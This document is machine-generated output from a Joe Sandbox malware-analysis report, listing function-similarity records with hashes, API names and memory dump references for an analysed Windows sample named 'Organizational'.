                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: da9a8d7283ffa81ddbdd882c3c9655766350943d07336188f3daad1448a29d9d
                                                    • Instruction ID: 52fd90ed28acf395750f6dd83a8bf6ffe6a0c05fdcf09bcd462ab730151ee786
                                                    • Opcode Fuzzy Hash: da9a8d7283ffa81ddbdd882c3c9655766350943d07336188f3daad1448a29d9d
                                                    • Instruction Fuzzy Hash: 20F0C836D0421DA6CB20BA58ED169EE77ACAF05760F100455F91492192EFB58BC1F6E1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: 0597f80194d8bdf3a6e785ef56f6d1df62f749d7981eb1109e817848c88be468
                                                    • Instruction ID: 52f25cde5efee7b7e50ca1cf57e494899cac4932416fe4b6ebb1b47512f0b20c
                                                    • Opcode Fuzzy Hash: 0597f80194d8bdf3a6e785ef56f6d1df62f749d7981eb1109e817848c88be468
                                                    • Instruction Fuzzy Hash: A8014471C00749EBCF11AF69CD019DE7B61AFC0770F144115B8245A1A1D7398A92FF91
                                                    APIs
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • __lock_file.LIBCMT ref: 00F1560B
                                                      • Part of subcall function 00F16E3E: __lock.LIBCMT ref: 00F16E61
                                                    • __fclose_nolock.LIBCMT ref: 00F15616
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 3984369eb9f6b94090ac336d2747ab1990f4f9b2a277ae806b6135e74eaad306
                                                    • Instruction ID: 1882f8584d4c806432e220bad0ddfcdfa14e0c5c65b847e8f135b8920742285d
                                                    • Opcode Fuzzy Hash: 3984369eb9f6b94090ac336d2747ab1990f4f9b2a277ae806b6135e74eaad306
                                                    • Instruction Fuzzy Hash: FFF09671801B05DAD710AB758D027DE77A25F81774F154205A414AB1C1CF7C89C2BF51
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00F15EB4
                                                    • __ftell_nolock.LIBCMT ref: 00F15EBF
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: 03ed8273f4e6f66e250078ffd3f0dc38011b1ab8d180a9edf93082895f0bc660
                                                    • Instruction ID: e42848b6fdd076c504a35ec584da249925ce94d8def74844285aa5e048a7f4e2
                                                    • Opcode Fuzzy Hash: 03ed8273f4e6f66e250078ffd3f0dc38011b1ab8d180a9edf93082895f0bc660
                                                    • Instruction Fuzzy Hash: F4F0A072D51615DADB00BB748E037DE72A06F81771F214206B424AB1D2CFBC8AC3BB95
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05AEF
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F05B1F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell__memset
                                                    • String ID:
                                                    • API String ID: 928536360-0
                                                    • Opcode ID: 4fdef377b67ad4c56adf38b22ebfaba8c65d78d9cc88f5c500c10617eae07d75
                                                    • Instruction ID: 4175493657db1f62ea41b5422707e7220d1357bc7af079a68cfc5fe7b8c197e4
                                                    • Opcode Fuzzy Hash: 4fdef377b67ad4c56adf38b22ebfaba8c65d78d9cc88f5c500c10617eae07d75
                                                    • Instruction Fuzzy Hash: BFF0A77091830C9FD7A2DB64DC857E6B7BC9B4030CF0002E9AA4896292DB754B88DF51
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadString$__swprintf
                                                    • String ID:
                                                    • API String ID: 207118244-0
                                                    • Opcode ID: 988a226732269fd2f089e2a232d1e8a84918afd0917345ce789f9274cd20922b
                                                    • Instruction ID: 73b68ac93e2531e424c962b7a1200f0c876d5b18d36dc68dc2c383dc2348c875
                                                    • Opcode Fuzzy Hash: 988a226732269fd2f089e2a232d1e8a84918afd0917345ce789f9274cd20922b
                                                    • Instruction Fuzzy Hash: 10B14A35E0010AEFCB14EF94C891DFEBBB5FF48710F14811AE956A7291EB35A941EB90
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                    • Instruction ID: 7d213f64286addcee02e5105d683a508a4953cac8a2c22818f6c8b00cade6344
                                                    • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                    • Instruction Fuzzy Hash: 4761CEB060020A9FCB14DF50D885ABAB7F5EF84350F19817DEA1AAB291D7B4ED80DB51
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cda0315b1e3db3a754806c0c2b51e9201ab801c7f394b5464436a7a73392aafe
                                                    • Instruction ID: 400c8a6551abf8884379b9cf403491fe13b2c440c3b193adbfc9ce0f09c39ca4
                                                    • Opcode Fuzzy Hash: cda0315b1e3db3a754806c0c2b51e9201ab801c7f394b5464436a7a73392aafe
                                                    • Instruction Fuzzy Hash: 6951A075704608AFCB14EB64CD91EBE77A6AF85720F158158F906AB3D2CB34ED05EB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                    • Instruction ID: 63ab4cb53a05704ccb58119b5b3a0efa37f02b0e4d8a64868e12f576c85134e2
                                                    • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                    • Instruction Fuzzy Hash: 0931C379A04602DFC724DF18D840A21F7A8FF48320714C56AE98A8F7A5DB30DC81FB80
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00F041B2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 026435dbc5002bc302baf83829c2e697bf02021fb16cea7741f6b756d3acddab
                                                    • Instruction ID: dcfc3064b52114f1c1eb4a6ec02ea6b3af45d9dda0369607afb4b2df93747330
                                                    • Opcode Fuzzy Hash: 026435dbc5002bc302baf83829c2e697bf02021fb16cea7741f6b756d3acddab
                                                    • Instruction Fuzzy Hash: 883170B1A0061AAFCB19CF2CC8806ADB7B1FF54320F148629ED1593750D770BDA0EB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: a240ff76932633db89af50d19c9939a278075f0a82a39b345d2876b7f12cc213
                                                    • Instruction ID: 28ab34b441ea487109d66bbf91f3b4c5650375d15c63d87373d586c3390ec0d2
                                                    • Opcode Fuzzy Hash: a240ff76932633db89af50d19c9939a278075f0a82a39b345d2876b7f12cc213
                                                    • Instruction Fuzzy Hash: DF414A74508355DFDB24DF14C484B2ABBE1BF44318F1989ACE9899B362C336EC85DB52
                                                    APIs
                                                      • Part of subcall function 00F04B29: FreeLibrary.KERNEL32(00000000,?), ref: 00F04B63
                                                      • Part of subcall function 00F1547B: __wfsopen.LIBCMT ref: 00F15486
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F027AF,?,00000001), ref: 00F049F4
                                                      • Part of subcall function 00F04ADE: FreeLibrary.KERNEL32(00000000), ref: 00F04B18
                                                      • Part of subcall function 00F048B0: _memmove.LIBCMT ref: 00F048FA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 6184c93a218f4d06aba9bbe624e5ff36efbf32dc327adbf4984d80a27b514163
                                                    • Instruction ID: 6cf7935571154d087488ed9128434402f2600139299b5881b65a9df6c77576a2
                                                    • Opcode Fuzzy Hash: 6184c93a218f4d06aba9bbe624e5ff36efbf32dc327adbf4984d80a27b514163
                                                    • Instruction Fuzzy Hash: 2C11E772750205ABDB14FF74CD06FAE77A99F40711F108429FA41A61C1EE7CAA14B794
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 3c872586c6a83b49469388addf2ad73797504496c466a495a86d7222f0ad4d8d
                                                    • Instruction ID: 7e0f10b457c48bb52fa1d3099f1d1f3dee6ffe40fc5e1b006182115c6af2f8b8
                                                    • Opcode Fuzzy Hash: 3c872586c6a83b49469388addf2ad73797504496c466a495a86d7222f0ad4d8d
                                                    • Instruction Fuzzy Hash: BE212574908355DFDB54DF14C844B6ABBE0BF88304F05496CFA8A67362D731E849DB92
                                                    APIs
                                                    • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00F03CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00F04276
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: b29281158d0b2f9366187ba7ece13ccfe98660fa4bf785185440ad322499525a
                                                    • Instruction ID: 148b39ae88076ef35759f2292c8d9003a3c4ebde07ab00549da7fa835b5b801f
                                                    • Opcode Fuzzy Hash: b29281158d0b2f9366187ba7ece13ccfe98660fa4bf785185440ad322499525a
                                                    • Instruction Fuzzy Hash: 8A114CB1600B019FD730CF55C980B62B7F5EF88720F10C92DEAAA86A90D770F845EB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                    • Instruction ID: 71da2c6a14da7ebc985c2459d91ed62263df9902e1e876c59786963d16f5d42f
                                                    • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                    • Instruction Fuzzy Hash: 2701D6726017016ED7245B38DC06BA7BB98EB447A0F50852EFA1ACA1D1EB75E490A7A0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                    • Instruction ID: 05c9fd88305d8b1c5af389d25d37a789928be46724bebc5e38181466ea57fd9e
                                                    • Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                    • Instruction Fuzzy Hash: 3B01F9322002156BCB14DF2DCC9196BB7A9EFC6364714853EF90ECB205E631E845C790
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00F64998
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: 919c177a0a0c9e6ddfaefdc4c44d380a07755ceaa355fd83418e09d522ad256a
                                                    • Instruction ID: 690126545169e263c63ce95e50d606b986eda69de99fc2114b2eb040f4c0945e
                                                    • Opcode Fuzzy Hash: 919c177a0a0c9e6ddfaefdc4c44d380a07755ceaa355fd83418e09d522ad256a
                                                    • Instruction Fuzzy Hash: 21F03175608208AF8B14FB65DC46CAF77BCEF49320B004155F9089B2A1DE75BD81EB60
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                    • _memset.LIBCMT ref: 00F57CB4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw_memsetstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 525207782-0
                                                    • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                    • Instruction ID: 3c7e497da9a615dd15fd1f5694c238f748a63110281b74e1e4a1a6188f02c94d
                                                    • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                    • Instruction Fuzzy Hash: C601FB756042049FD321EF5CD942F45BBE1EF5D310F258459F5888B392DB76E881EB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _fseek
                                                    • String ID:
                                                    • API String ID: 2937370855-0
                                                    • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction ID: 79d197bba019f81789f47061d06231f202239bfc235a6fc8fbd1ff5e7995169e
                                                    • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction Fuzzy Hash: 59F052B6900208BBDF108F84DC00DEABB69EB89720F004598FA045A210D232EA61ABA0
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,00F027AF,?,00000001), ref: 00F04A63
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 18976368c5092bc0507677532f350141054a1e31ebca050135fe9fc43c84bf58
